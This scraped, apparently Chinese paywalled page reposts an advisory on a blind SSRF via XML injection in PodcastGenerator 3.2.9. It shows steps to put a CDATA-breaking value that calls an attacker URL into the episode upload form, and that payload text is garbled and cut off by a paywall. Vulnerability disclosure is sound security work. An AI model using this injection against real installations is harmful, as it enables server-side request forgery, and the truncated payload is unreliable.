51565_podcastGenerator 3.2.9 -blind SSRF通过XML注入-PHP WebApps exploit.txt

详情

#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
#Application: PodcastGenerator
#Version: v3.2.9
#Bugs:  Blind SSRF via XML Injection
#Technology: PHP
#Vendor URL: https://podcastgenerator.net/
#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
#Date of found: 01-07-2023
#Author: Mirabbas AÄŸalarov
#Tested on: Linux 

2. Technical Details & POC
========================================
steps: 
1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)
2. Fill all section and Short Description section set as 'test]]>( example :Attacker domain)http://localhost:3132http://localhost:3132http://localhost:3132

[/hidecontent]

51565_podcastGenerator 3.2.9 -blind SSRF通过XML注入-PHP WebApps exploit.txt-棉花糖会员站
51565_podcastGenerator 3.2.9 -blind SSRF通过XML注入-PHP WebApps exploit.txt
此内容为付费阅读,请付费后查看
9999积分
付费阅读
© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容